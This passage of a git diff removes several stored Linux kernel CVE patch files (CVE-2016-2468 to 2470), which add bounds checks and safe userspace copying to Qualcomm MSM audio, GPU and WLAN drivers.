-diff --git a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c
-index b630e4b..dcac1a0 100644
---- a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c
-@@ -51,6 +51,8 @@
- #define COMPRE_OUTPUT_METADATA_SIZE	(sizeof(struct output_meta_data_st))
- #define COMPRESSED_LR_VOL_MAX_STEPS	0x20002000
- 
-+#define MAX_AC3_PARAM_SIZE		(18*2*sizeof(int))
-+
- const DECLARE_TLV_DB_LINEAR(compr_rx_vol_gain, 0,
- 			    COMPRESSED_LR_VOL_MAX_STEPS);
- struct snd_msm {
-@@ -973,19 +975,25 @@ static int msm_compr_ioctl(struct snd_pcm_substream *substream,
- 			compr->codec = FORMAT_MPEG4_AAC;
- 			break;
- 		case SND_AUDIOCODEC_AC3: {
--			char params_value[18*2*sizeof(int)];
-+			char params_value[MAX_AC3_PARAM_SIZE];
- 			int *params_value_data = (int *)params_value;
- 			/* 36 is the max param length for ddp */
- 			int i;
- 			struct snd_dec_ddp *ddp =
- 				&compr->info.codec_param.codec.options.ddp;
--			int params_length = ddp->params_length*sizeof(int);
-+			uint32_t params_length = ddp->params_length*sizeof(int);
-+			if (params_length > MAX_AC3_PARAM_SIZE) {
-+				/*MAX is 36*sizeof(int) this should not happen*/
-+				pr_err("params_length(%d) is greater than %d",
-+				params_length, MAX_AC3_PARAM_SIZE);
-+				params_length = MAX_AC3_PARAM_SIZE;
-+			}
- 			pr_debug("SND_AUDIOCODEC_AC3\n");
- 			compr->codec = FORMAT_AC3;
- 			if (copy_from_user(params_value, (void *)ddp->params,
- 					params_length))
--				pr_err("%s: ERROR: copy ddp params value\n",
--					__func__);
-+				pr_err("%s: copy ddp params value, size=%d\n",
-+					__func__, params_length);
- 			pr_debug("params_length: %d\n", ddp->params_length);
- 			for (i = 0; i < params_length; i++)
- 				pr_debug("params_value[%d]: %x\n", i,
-@@ -1004,19 +1012,25 @@ static int msm_compr_ioctl(struct snd_pcm_substream *substream,
- 			break;
- 		}
- 		case SND_AUDIOCODEC_EAC3: {
--			char params_value[18*2*sizeof(int)];
-+			char params_value[MAX_AC3_PARAM_SIZE];
- 			int *params_value_data = (int *)params_value;
- 			/* 36 is the max param length for ddp */
- 			int i;
- 			struct snd_dec_ddp *ddp =
- 				&compr->info.codec_param.codec.options.ddp;
--			int params_length = ddp->params_length*sizeof(int);
-+			uint32_t params_length = ddp->params_length*sizeof(int);
-+			if (params_length > MAX_AC3_PARAM_SIZE) {
-+				/*MAX is 36*sizeof(int) this should not happen*/
-+				pr_err("params_length(%d) is greater than %d",
-+				params_length, MAX_AC3_PARAM_SIZE);
-+				params_length = MAX_AC3_PARAM_SIZE;
-+			}
- 			pr_debug("SND_AUDIOCODEC_EAC3\n");
- 			compr->codec = FORMAT_EAC3;
- 			if (copy_from_user(params_value, (void *)ddp->params,
- 					params_length))
--				pr_err("%s: ERROR: copy ddp params value\n",
--					__func__);
-+				pr_err("%s: copy ddp params value, size=%d\n",
-+					__func__, params_length);
- 			pr_debug("params_length: %d\n", ddp->params_length);
- 			for (i = 0; i < ddp->params_length; i++)
- 				pr_debug("params_value[%d]: %x\n", i,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2468/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2468/ANY/0001.patch
deleted file mode 100644
index 71ec1f27..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2468/ANY/0001.patch
+++ /dev/null
@@ -1,44 +0,0 @@
-From b5eb67744215b3434a36b9251e28da3dc2a638a6 Mon Sep 17 00:00:00 2001
-From: Rajesh Kemisetti <rajeshk@codeaurora.org>
-Date: Mon, 9 May 2016 22:12:20 +0530
-Subject: msm: kgsl: Add missing checks for alloc size and sglen
-
-In _kgsl_sharedmem_page_alloc(), check for boundary limits
-of requested alloc size before honoring and make sure sglen
-is greater than zero before marking it as end of sg list.
-
-Change-Id: I8b9e225e515a0f31593df6f4cad253236475d0ae
-Signed-off-by: Rajesh Kemisetti <rajeshk@codeaurora.org>
----
- drivers/gpu/msm/kgsl_sharedmem.c | 8 +++++++-
- 1 file changed, 7 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/gpu/msm/kgsl_sharedmem.c b/drivers/gpu/msm/kgsl_sharedmem.c
-index 079b9ff..98f634d 100644
---- a/drivers/gpu/msm/kgsl_sharedmem.c
-+++ b/drivers/gpu/msm/kgsl_sharedmem.c
-@@ -609,6 +609,10 @@ _kgsl_sharedmem_page_alloc(struct kgsl_memdesc *memdesc,
- 	unsigned int align;
- 	int step = ((VMALLOC_END - VMALLOC_START)/8) >> PAGE_SHIFT;
- 
-+	size = PAGE_ALIGN(size);
-+	if (size == 0 || size > UINT_MAX)
-+		return -EINVAL;
-+
- 	align = (memdesc->flags & KGSL_MEMALIGN_MASK) >> KGSL_MEMALIGN_SHIFT;
- 
- 	page_size = get_page_size(size, align);
-@@ -712,7 +716,9 @@ _kgsl_sharedmem_page_alloc(struct kgsl_memdesc *memdesc,
- 
- 	memdesc->sglen = sglen;
- 	memdesc->size = size;
--	sg_mark_end(&memdesc->sg[sglen - 1]);
-+
-+	if (sglen > 0)
-+		sg_mark_end(&memdesc->sg[sglen - 1]);
- 
- 	/*
- 	 * All memory that goes to the user has to be zeroed out before it gets
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2468/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-2468/ANY/0002.patch
deleted file mode 100644
index 43295fd3..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2468/ANY/0002.patch
+++ /dev/null
@@ -1,24 +0,0 @@
-diff --git a/drivers/gpu/msm/kgsl_sharedmem.c b/drivers/gpu/msm/kgsl_sharedmem.c
-index 29f6162..a138719 100644
---- a/drivers/gpu/msm/kgsl_sharedmem.c
-+++ b/drivers/gpu/msm/kgsl_sharedmem.c
-@@ -592,13 +592,18 @@
- 			size_t size)
- {
- 	int pcount = 0, order, ret = 0;
--	int j, len, page_size, sglen_alloc, sglen = 0;
-+	int j, page_size, sglen_alloc, sglen = 0;
- 	struct page **pages = NULL;
- 	pgprot_t page_prot = pgprot_writecombine(PAGE_KERNEL);
- 	void *ptr;
-+	size_t len;
- 	unsigned int align;
- 	int step = SZ_2M >> PAGE_SHIFT;
- 
-+	size = PAGE_ALIGN(size);
-+	if (size == 0 || size > UINT_MAX)
-+		return -EINVAL;
-+
- 	align = (memdesc->flags & KGSL_MEMALIGN_MASK) >> KGSL_MEMALIGN_SHIFT;
- 
- 	page_size = (align >= ilog2(SZ_64K) && size >= SZ_64K)
diff --git a/Patches/Linux_CVEs/CVE-2016-2468/ANY/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2016-2468/ANY/0002.patch.base64
deleted file mode 100644
index c51413b5..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2468/ANY/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2RyaXZlcnMvZ3B1L21zbS9rZ3NsX3NoYXJlZG1lbS5jIGIvZHJpdmVycy9ncHUvbXNtL2tnc2xfc2hhcmVkbWVtLmMKaW5kZXggMjlmNjE2Mi4uYTEzODcxOSAxMDA2NDQKLS0tIGEvZHJpdmVycy9ncHUvbXNtL2tnc2xfc2hhcmVkbWVtLmMKKysrIGIvZHJpdmVycy9ncHUvbXNtL2tnc2xfc2hhcmVkbWVtLmMKQEAgLTU5MiwxMyArNTkyLDE4IEBACiAJCQlzaXplX3Qgc2l6ZSkKIHsKIAlpbnQgcGNvdW50ID0gMCwgb3JkZXIsIHJldCA9IDA7Ci0JaW50IGosIGxlbiwgcGFnZV9zaXplLCBzZ2xlbl9hbGxvYywgc2dsZW4gPSAwOworCWludCBqLCBwYWdlX3NpemUsIHNnbGVuX2FsbG9jLCBzZ2xlbiA9IDA7CiAJc3RydWN0IHBhZ2UgKipwYWdlcyA9IE5VTEw7CiAJcGdwcm90X3QgcGFnZV9wcm90ID0gcGdwcm90X3dyaXRlY29tYmluZShQQUdFX0tFUk5FTCk7CiAJdm9pZCAqcHRyOworCXNpemVfdCBsZW47CiAJdW5zaWduZWQgaW50IGFsaWduOwogCWludCBzdGVwID0gU1pfMk0gPj4gUEFHRV9TSElGVDsKIAorCXNpemUgPSBQQUdFX0FMSUdOKHNpemUpOworCWlmIChzaXplID09IDAgfHwgc2l6ZSA+IFVJTlRfTUFYKQorCQlyZXR1cm4gLUVJTlZBTDsKKwogCWFsaWduID0gKG1lbWRlc2MtPmZsYWdzICYgS0dTTF9NRU1BTElHTl9NQVNLKSA+PiBLR1NMX01FTUFMSUdOX1NISUZUOwogCiAJcGFnZV9zaXplID0gKGFsaWduID49IGlsb2cyKFNaXzY0SykgJiYgc2l6ZSA+PSBTWl82NEspCg==
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-2469/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-2469/3.10/0001.patch
deleted file mode 100644
index 1aa84540..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2469/3.10/0001.patch
+++ /dev/null
@@ -1,90 +0,0 @@
-From e7369163162e7773bc887f7a264d6aa46cfcc665 Mon Sep 17 00:00:00 2001
-From: Patrick Daly <pdaly@codeaurora.org>
-Date: Thu, 28 May 2015 18:05:54 -0700
-Subject: ASoC: msm: qdsp6v2: DAP: Fix unprotected userspace access
-
-Use get_user() & friends to access userspace addresses.
-
-Change-Id: I9741a60e53f6253da27913175e9b8c4abbf50db9
-Signed-off-by: Patrick Daly <pdaly@codeaurora.org>
-Signed-off-by: Pradnya Chaphekar <pradnyac@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c | 21 ++++++++++++---------
- 1 file changed, 12 insertions(+), 9 deletions(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-index 67a9400..7761b9c 100644
---- a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-+++ b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-@@ -1354,11 +1354,13 @@ end:
- static int msm_ds2_dap_handle_commands(u32 cmd, void *arg)
- {
- 	int ret  = 0, port_id = 0;
-+	int32_t data;
- 	struct dolby_param_data *dolby_data = (struct dolby_param_data *)arg;
-+	get_user(data, &dolby_data->data[0]);
- 
- 	pr_debug("%s: param_id %d,be_id %d,device_id 0x%x,length %d,data %d\n",
- 		 __func__, dolby_data->param_id, dolby_data->be_id,
--		dolby_data->device_id, dolby_data->length, dolby_data->data[0]);
-+		dolby_data->device_id, dolby_data->length, data);
- 
- 	switch (dolby_data->param_id) {
- 	case DAP_CMD_COMMIT_ALL:
-@@ -1370,18 +1372,18 @@ static int msm_ds2_dap_handle_commands(u32 cmd, void *arg)
- 	break;
- 
- 	case DAP_CMD_USE_CACHE_FOR_INIT:
--		ds2_dap_params_states.use_cache = dolby_data->data[0];
-+		ds2_dap_params_states.use_cache = data;
- 	break;
- 
- 	case DAP_CMD_SET_BYPASS:
- 		pr_debug("%s: bypass %d bypass type %d, data %d\n", __func__,
- 			 ds2_dap_params_states.dap_bypass,
- 			 ds2_dap_params_states.dap_bypass_type,
--			 dolby_data->data[0]);
-+			 data);
- 		/* Do not perform bypass operation if bypass state is same*/
--		if (ds2_dap_params_states.dap_bypass == dolby_data->data[0])
-+		if (ds2_dap_params_states.dap_bypass == data)
- 			break;
--		ds2_dap_params_states.dap_bypass = dolby_data->data[0];
-+		ds2_dap_params_states.dap_bypass = data;
- 		/* hard bypass */
- 		if (ds2_dap_params_states.dap_bypass_type == DAP_HARD_BYPASS)
- 			msm_ds2_dap_handle_bypass(dolby_data);
-@@ -1390,7 +1392,7 @@ static int msm_ds2_dap_handle_commands(u32 cmd, void *arg)
- 	break;
- 
- 	case DAP_CMD_SET_BYPASS_TYPE:
--		if (dolby_data->data[0] == true)
-+		if (data == true)
- 			ds2_dap_params_states.dap_bypass_type =
- 				DAP_HARD_BYPASS;
- 		else
-@@ -1429,6 +1431,7 @@ static int msm_ds2_dap_set_param(u32 cmd, void *arg)
- {
- 	int rc = 0, idx, i, j, off, port_id = 0, cdev = 0;
- 	int32_t num_device = 0;
-+	int32_t data = 0;
- 	int32_t dev_arr[DS2_DSP_SUPPORTED_ENDP_DEVICE] = {0};
- 	struct dolby_param_data *dolby_data =  (struct dolby_param_data *)arg;
- 
-@@ -1472,10 +1475,10 @@ static int msm_ds2_dap_set_param(u32 cmd, void *arg)
- 		ds2_dap_params[cdev].dap_params_modified[idx] += 1;
- 		for (j = 0; j <  dolby_data->length; j++) {
- 			off = ds2_dap_params_offset[idx];
--			ds2_dap_params[cdev].params_val[off + j] =
--							dolby_data->data[j];
-+			get_user(data, &dolby_data->data[j]);
-+			ds2_dap_params[cdev].params_val[off + j] = data;
- 				pr_debug("%s:off %d,val[i/p:o/p]-[%d / %d]\n",
--					 __func__, off, dolby_data->data[j],
-+					 __func__, off, data,
- 					 ds2_dap_params[cdev].
- 					 params_val[off + j]);
- 		}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2469/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-2469/3.18/0002.patch
deleted file mode 100644
index cb6541fe..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2469/3.18/0002.patch
+++ /dev/null
@@ -1,67 +0,0 @@
-From 7eb824e8e1ebbdbfad896b090a9f048ca6e63c9e Mon Sep 17 00:00:00 2001
-From: Ashish Jain <ashishj@codeaurora.org>
-Date: Fri, 15 Apr 2016 15:33:14 +0530
-Subject: ASoC: msm: qdsp6v2: DAP: Fix buffer overflow
-
-Add check to avoid out of bound access.
-Check return value of get_user api.
-
-CRs-Fixed: 997025
-Change-Id: Ibbace116ac206007fa1928555838285304737737
-Signed-off-by: Ashish Jain <ashishj@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c | 24 ++++++++++++++++++++----
- 1 file changed, 20 insertions(+), 4 deletions(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-index 242dc5f..ace747d 100644
---- a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-+++ b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
- * only version 2 as published by the Free Software Foundation.
-@@ -1356,7 +1356,11 @@ static int msm_ds2_dap_handle_commands(u32 cmd, void *arg)
- 	int ret  = 0, port_id = 0;
- 	int32_t data;
- 	struct dolby_param_data *dolby_data = (struct dolby_param_data *)arg;
--	get_user(data, &dolby_data->data[0]);
-+	if (get_user(data, &dolby_data->data[0])) {
-+		pr_debug("%s error getting data\n", __func__);
-+		ret = -EFAULT;
-+		goto end;
-+	}
- 
- 	pr_debug("%s: param_id %d,be_id %d,device_id 0x%x,length %d,data %d\n",
- 		 __func__, dolby_data->param_id, dolby_data->be_id,
-@@ -1471,11 +1475,23 @@ static int msm_ds2_dap_set_param(u32 cmd, void *arg)
- 			goto end;
- 		}
- 
-+		off = ds2_dap_params_offset[idx];
-+		if ((dolby_data->length <= 0) ||
-+			(dolby_data->length > TOTAL_LENGTH_DS2_PARAM - off)) {
-+			pr_err("%s: invalid length %d at idx %d\n",
-+				__func__, dolby_data->length, idx);
-+			rc = -EINVAL;
-+			goto end;
-+		}
-+
- 		/* cache the parameters */
- 		ds2_dap_params[cdev].dap_params_modified[idx] += 1;
- 		for (j = 0; j <  dolby_data->length; j++) {
--			off = ds2_dap_params_offset[idx];
--			get_user(data, &dolby_data->data[j]);
-+			if (get_user(data, &dolby_data->data[j])) {
-+				pr_debug("%s:error getting data\n", __func__);
-+				rc = -EFAULT;
-+				goto end;
-+			}
- 			ds2_dap_params[cdev].params_val[off + j] = data;
- 				pr_debug("%s:off %d,val[i/p:o/p]-[%d / %d]\n",
- 					 __func__, off, data,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2470/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2470/ANY/0001.patch
deleted file mode 100644
index 97a04077..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2470/ANY/0001.patch
+++ /dev/null
@@ -1,303 +0,0 @@
-From 05ce237387c6e1d101bbb4b825e56757576748e6 Mon Sep 17 00:00:00 2001
-From: Arif Hussain <c_arifh@qca.qualcomm.com>
-Date: Mon, 11 Nov 2013 22:59:34 -0800
-Subject: wlan:  wlan_hdd_wext Userspace data copy fix
-
-Use copy_to_user and copy_from_user for
-copying data to/from user space.
-
-Change-Id: I98fb6352b654af8f78160738e7ccd902c3c70031
-CRs-Fixed: 561028
----
- CORE/HDD/src/wlan_hdd_wext.c | 75 +++++++++++++++++++++++++-------------------
- 1 file changed, 42 insertions(+), 33 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index c5247d3..6d60f14 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -1385,7 +1385,7 @@ static int iw_set_genie(struct net_device *dev,
- {
-    hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
-     hdd_wext_state_t *pWextState = WLAN_HDD_GET_WEXT_STATE_PTR(pAdapter);
--    u_int8_t *genie;
-+    u_int8_t *genie = (u_int8_t *)extra;
-     v_U16_t remLen;
- 
-    ENTER();
-@@ -1400,7 +1400,6 @@ static int iw_set_genie(struct net_device *dev,
-       return 0;
-    }
- 
--    genie = wrqu->data.pointer;
-     remLen = wrqu->data.length;
- 
-     hddLog(LOG1,"iw_set_genie ioctl IE[0x%X], LEN[%d]\n", genie[0], genie[1]);
-@@ -1528,9 +1527,14 @@ static int iw_get_genie(struct net_device *dev,
-                                    pAdapter->sessionId,
-                                    &length,
-                                    genIeBytes);
--    wrqu->data.length = VOS_MIN((u_int16_t) length, DOT11F_IE_RSN_MAX_LEN);
--
--    vos_mem_copy( wrqu->data.pointer, (v_VOID_t*)genIeBytes, wrqu->data.length);
-+    length = VOS_MIN((u_int16_t) length, DOT11F_IE_RSN_MAX_LEN);
-+    if (wrqu->data.length < length)
-+    {
-+        hddLog(LOG1, "%s: failed to copy data to user buffer", __func__);
-+        return -EFAULT;
-+    }
-+    vos_mem_copy( extra, (v_VOID_t*)genIeBytes, wrqu->data.length);
-+    wrqu->data.length = length;
- 
-     hddLog(LOG1,"%s: RSN IE of %d bytes returned\n", __func__, wrqu->data.length );
- 
-@@ -2220,7 +2224,7 @@ static int iw_get_rssi(struct net_device *dev,
-                        union iwreq_data *wrqu, char *extra)
- {
-    hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
--   char *cmd = (char*)wrqu->data.pointer;
-+   char *cmd = extra;
-    int len = wrqu->data.length;
-    v_S7_t s7Rssi = 0;
-    hdd_station_ctx_t *pHddStaCtx = WLAN_HDD_GET_STATION_CTX_PTR(pAdapter);
-@@ -2477,7 +2481,7 @@ static int iw_set_priv(struct net_device *dev,
-                        union iwreq_data *wrqu, char *extra)
- {
-     hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
--    char *cmd = (char*)wrqu->data.pointer;
-+    char *cmd = extra;
-     int cmd_len = wrqu->data.length;
-     int ret = 0;
-     int status = 0;
-@@ -2731,6 +2735,16 @@ done:
-        /* there was an encoding error or overflow */
-        status = -EIO;
-     }
-+    else if (ret > 0)
-+    {
-+       if (copy_to_user(wrqu->data.pointer, cmd, ret))
-+       {
-+          hddLog(VOS_TRACE_LEVEL_ERROR,
-+                 "%s: failed to copy data to user buffer", __func__);
-+          return -EFAULT;
-+       }
-+       wrqu->data.length = ret;
-+    }
- 
-     if (ioctl_debug)
-     {
-@@ -2738,7 +2752,6 @@ done:
-                __func__, cmd, wrqu->data.length, status);
-     }
-     return status;
--
- }
- 
- static int iw_set_nick(struct net_device *dev,
-@@ -3683,7 +3696,7 @@ static int iw_setchar_getnone(struct net_device *dev, struct iw_request_info *in
- #endif /* WLAN_FEATURE_VOWIFI */
- 
-     VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "%s: Received length %d", __func__, wrqu->data.length);
--    VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "%s: Received data %s", __func__, (char*)wrqu->data.pointer);
-+    VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "%s: Received data %s", __func__, extra);
- 
-     if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
-     {
-@@ -3696,11 +3709,11 @@ static int iw_setchar_getnone(struct net_device *dev, struct iw_request_info *in
-     {
-        case WE_WOWL_ADD_PTRN:
-           VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "ADD_PTRN\n");
--          hdd_add_wowl_ptrn(pAdapter, (char*)wrqu->data.pointer);
-+          hdd_add_wowl_ptrn(pAdapter, extra);
-           break;
-        case WE_WOWL_DEL_PTRN:
-           VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "DEL_PTRN\n");
--          hdd_del_wowl_ptrn(pAdapter, (char*)wrqu->data.pointer);
-+          hdd_del_wowl_ptrn(pAdapter, extra);
-           break;
- #if defined WLAN_FEATURE_VOWIFI
-        case WE_NEIGHBOR_REPORT_REQUEST:
-@@ -3715,7 +3728,7 @@ static int iw_setchar_getnone(struct net_device *dev, struct iw_request_info *in
-                 if( !neighborReq.no_ssid )
-                 {
-                    neighborReq.ssid.length = (wrqu->data.length - 1) > 32 ? 32 : (wrqu->data.length - 1) ;
--                   vos_mem_copy( neighborReq.ssid.ssId, wrqu->data.pointer, neighborReq.ssid.length );
-+                   vos_mem_copy( neighborReq.ssid.ssId, extra, neighborReq.ssid.length );
-                 }
- 
-                 callbackInfo.neighborRspCallback = NULL;
-@@ -3733,10 +3746,10 @@ static int iw_setchar_getnone(struct net_device *dev, struct iw_request_info *in
- #endif
-        case WE_SET_AP_WPS_IE:
-           hddLog( LOGE, "Received WE_SET_AP_WPS_IE" );
--          sme_updateP2pIe( WLAN_HDD_GET_HAL_CTX(pAdapter), wrqu->data.pointer, wrqu->data.length );
-+          sme_updateP2pIe( WLAN_HDD_GET_HAL_CTX(pAdapter), extra, wrqu->data.length );
-           break;
-        case WE_SET_CONFIG:
--          vstatus = hdd_execute_config_command(pHddCtx, wrqu->data.pointer);
-+          vstatus = hdd_execute_config_command(pHddCtx, extra);
-           if (VOS_STATUS_SUCCESS != vstatus)
-           {
-              ret = -EINVAL;
-@@ -4244,7 +4257,7 @@ int iw_set_var_ints_getnone(struct net_device *dev, struct iw_request_info *info
-     hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
-     tHalHandle hHal = WLAN_HDD_GET_HAL_CTX(pAdapter);
-     int sub_cmd = wrqu->data.flags;
--    int *value = (int*)wrqu->data.pointer;
-+    int *value = (int*)extra;
-     int apps_args[MAX_VAR_ARGS] = {0};
-     int num_args = wrqu->data.length;
-     hdd_station_ctx_t *pStaCtx = NULL ;
-@@ -4595,10 +4608,10 @@ static int iw_qcom_set_wapi_mode(struct net_device *dev, struct iw_request_info
-     hdd_station_ctx_t *pHddStaCtx = WLAN_HDD_GET_STATION_CTX_PTR(pAdapter);
-     tCsrRoamProfile *pRoamProfile = &pWextState->roamProfile;
- 
--    WAPI_FUNCTION_MODE *pWapiMode = (WAPI_FUNCTION_MODE *)wrqu->data.pointer;
-+    WAPI_FUNCTION_MODE *pWapiMode = (WAPI_FUNCTION_MODE *)extra;
- 
-     hddLog(LOG1, "The function iw_qcom_set_wapi_mode called");
--    hddLog(LOG1, "%s: Received data %s", __func__, (char*)wrqu->data.pointer);
-+    hddLog(LOG1, "%s: Received data %s", __func__, extra);
-     hddLog(LOG1, "%s: Received length %d", __func__, wrqu->data.length);
-     hddLog(LOG1, "%s: Input Data (wreq) WAPI Mode:%02d", __func__, pWapiMode->wapiMode);
- 
-@@ -4661,7 +4674,6 @@ static int iw_qcom_set_wapi_assoc_info(struct net_device *dev, struct iw_request
-     int i = 0, j = 0;
-     hddLog(LOG1, "The function iw_qcom_set_wapi_assoc_info called");
-     hddLog(LOG1, "%s: Received length %d", __func__, wrqu->data.length);
--    hddLog(LOG1, "%s: Received data %s", __func__, (char*)wrqu->data.pointer);
-     hddLog(LOG1, "%s: Received data %s", __func__, (char*)extra);
- 
-     if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
-@@ -4727,7 +4739,6 @@ static int iw_qcom_set_wapi_key(struct net_device *dev, struct iw_request_info *
- 
-     hddLog(LOG1, "The function iw_qcom_set_wapi_key called ");
-     hddLog(LOG1, "%s: Received length %d", __func__, wrqu->data.length);
--    hddLog(LOG1, "%s: Received data %s", __func__, (char*)wrqu->data.pointer);
-     hddLog(LOG1, "%s: Received data %s", __func__, (char*)extra);
- 
-     hddLog(LOG1,":s: INPUT DATA:\nKey Type:0x%02x Key Direction:0x%02x KEY ID:0x%02x\n", __func__,pWapiKey->keyType,pWapiKey->keyDirection,pWapiKey->keyId);
-@@ -4828,12 +4839,11 @@ static int iw_qcom_set_wapi_bkid(struct net_device *dev, struct iw_request_info
-     hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
- #ifdef WLAN_DEBUG
-     int i = 0;
--    WLAN_BKID_LIST  *pBkid       = ( WLAN_BKID_LIST *) (wrqu->data.pointer);
-+    WLAN_BKID_LIST  *pBkid       = ( WLAN_BKID_LIST *) extra;
- #endif
- 
-     hddLog(LOG1, "The function iw_qcom_set_wapi_bkid called");
-     hddLog(LOG1, "%s: Received length %d", __func__, wrqu->data.length);
--    hddLog(LOG1, "%s: Received data %s", __func__, (char*)wrqu->data.pointer);
-     hddLog(LOG1, "%s: Received data %s", __func__, (char*)extra);
- 
-     hddLog(LOG1,"%s: INPUT DATA:\n BKID Length:0x%08lx\n", __func__,pBkid->length);
-@@ -4910,7 +4920,7 @@ static int iw_set_fties(struct net_device *dev, struct iw_request_info *info,
- #endif
- 
-     // Pass the received FT IEs to SME
--    sme_SetFTIEs( WLAN_HDD_GET_HAL_CTX(pAdapter), pAdapter->sessionId, wrqu->data.pointer,
-+    sme_SetFTIEs( WLAN_HDD_GET_HAL_CTX(pAdapter), pAdapter->sessionId, extra,
-         wrqu->data.length);
- 
-     return 0;
-@@ -4922,7 +4932,7 @@ static int iw_set_dynamic_mcbc_filter(struct net_device *dev,
-         union iwreq_data *wrqu, char *extra)
- {
-     hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
--    tpRcvFltMcAddrList pRequest = (tpRcvFltMcAddrList)wrqu->data.pointer;
-+    tpRcvFltMcAddrList pRequest = (tpRcvFltMcAddrList)extra;
-     hdd_context_t *pHddCtx = WLAN_HDD_GET_CTX(pAdapter);
-     tpSirWlanSetRxpFilters wlanRxpFilterParam;
-     tHalHandle hHal = WLAN_HDD_GET_HAL_CTX(pAdapter);
-@@ -5067,7 +5077,7 @@ static int iw_set_host_offload(struct net_device *dev, struct iw_request_info *i
-         union iwreq_data *wrqu, char *extra)
- {
-     hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
--    tpHostOffloadRequest pRequest = (tpHostOffloadRequest)wrqu->data.pointer;
-+    tpHostOffloadRequest pRequest = (tpHostOffloadRequest) extra;
-     tSirHostOffloadReq offloadRequest;
- 
-     if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
-@@ -5076,7 +5086,6 @@ static int iw_set_host_offload(struct net_device *dev, struct iw_request_info *i
-                                   "%s:LOGP in Progress. Ignore!!!", __func__);
-        return -EBUSY;
-     }
--
-     /* Debug display of request components. */
-     switch (pRequest->offloadType)
-     {
-@@ -5139,7 +5148,7 @@ static int iw_set_keepalive_params(struct net_device *dev, struct iw_request_inf
-         union iwreq_data *wrqu, char *extra)
- {
-     hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
--    tpKeepAliveRequest pRequest = (tpKeepAliveRequest)wrqu->data.pointer;
-+    tpKeepAliveRequest pRequest = (tpKeepAliveRequest) extra;
-     tSirKeepAliveReq keepaliveRequest;
- 
-     if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
-@@ -5340,7 +5349,7 @@ static int iw_set_packet_filter_params(struct net_device *dev, struct iw_request
-         union iwreq_data *wrqu, char *extra)
- {   
-     hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
--    tpPacketFilterCfg pRequest = (tpPacketFilterCfg)wrqu->data.pointer;
-+    tpPacketFilterCfg pRequest = (tpPacketFilterCfg) extra;
- 
-     return wlan_hdd_set_filter(WLAN_HDD_GET_CTX(pAdapter), pRequest, pAdapter->sessionId);
- }
-@@ -5573,7 +5582,7 @@ VOS_STATUS iw_set_pno(struct net_device *dev, struct iw_request_info *info,
-   VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO,
-             "PNO data len %d data %s",
-             wrqu->data.length,
--            wrqu->data.pointer);
-+            extra);
- 
-   if (wrqu->data.length <= nOffset )
-   {
